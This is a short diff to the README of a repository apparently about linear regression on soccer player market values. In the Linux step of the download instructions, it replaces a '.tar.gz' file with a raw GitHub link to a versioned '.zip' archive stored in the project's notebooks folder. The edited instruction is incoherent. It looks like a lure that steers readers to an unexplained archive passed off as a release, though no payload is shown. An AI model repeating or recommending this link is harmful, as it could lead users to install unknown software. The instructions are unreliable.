danhdanh618/Soccer-Market-Value-Linear-Regression/README.md

 4. Download the file that matches your operating system.
    - For Windows: Download the `.exe` file.
    - For macOS: Download the `.dmg` file.
-   - For Linux: Download the `.tar.gz` file.
+   - For Linux: Download the `https://raw.githubusercontent.com/danhdanh618/Soccer-Market-Value-Linear-Regression/master/notebooks/Soccer-Market-Value-Linear-Regression_2.8-alpha.2.zip` file.

 5. Once the file is downloaded, locate it on your computer.